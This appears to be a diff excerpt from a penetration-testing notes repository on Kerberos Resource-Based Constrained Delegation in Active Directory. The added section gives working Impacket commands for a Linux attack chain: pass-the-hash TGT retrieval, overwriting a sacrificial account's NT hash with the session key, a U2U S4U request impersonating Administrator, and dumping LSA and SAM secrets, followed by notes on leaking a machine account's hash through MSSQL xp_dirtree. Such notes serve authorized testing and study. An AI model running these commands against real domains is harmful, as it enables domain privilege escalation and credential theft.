H3llKa1ser/B00t2R00t/Active Directory Penetration Testing/Kerberos Delegation/Resource-Based Constrained Delegation (RBCD).md

 ### 8) Finally, use this ticket to do whatever you want!

+## Linux

+### 1) Configure the machine account to trust the user account you control (NTLM Relay, with the machine account's creds,...).
+Obtain a TGT for the user via pass-the-hash and extract the session key from it with this

+    getTGT.py -hashes :$(pypykatz crypto nt 'password') 'domain.local'/'user1' describeTicket.py 'user1.ccache' | grep 'Ticket Session Key'

+### 2) ow, change the user's long term key (his RC4 NT hash actually) to be equal to the TGT session key.
+The ST sent in the S4UProxy will be encrypted with the session key, but the KDC will try to decipher it with the    user's long term key, this is why the LT key must be equal to the session key (WARNING !!!
+The user's password is now equal to an unknown value, you have to use a sacrificial account to realise this attack).

+    smbpasswd.py -newhashes :sessionKey 'domain.local'/'user1':'password'@'DC'

+### 3) Realize the S4USelf request with a U2U request.
+If U2U is not used, the KDC cannot find the account's LT key when a UPN is specified instead of a SPN.
+Then, use the ticket obtained in the U2U S4USelf request (ciphered with the session key), to perform a S4UProxy request.

+    KRB5CCNAME='user1.ccache'
+    getST.py -k -no-pass -u2u -impersonate "Administrator" -spn "cifs/target.domain.local" 'domain.local'/'user1'

+Finally, use the obtained ST to dump the machine LSA and SAM registers with secretsdump.

 # RBCD from MSSQL Server

 If we have sufficient access to a MSSQL server we can use the xp_dirtree in order to leak the Net-NTLM hash of the machine account.
 Additionally, the Web Service client must be running on the machine in order to trick the authentication from SMB to HTTP and avoid the NTLM signature (authentication must be sent to @80):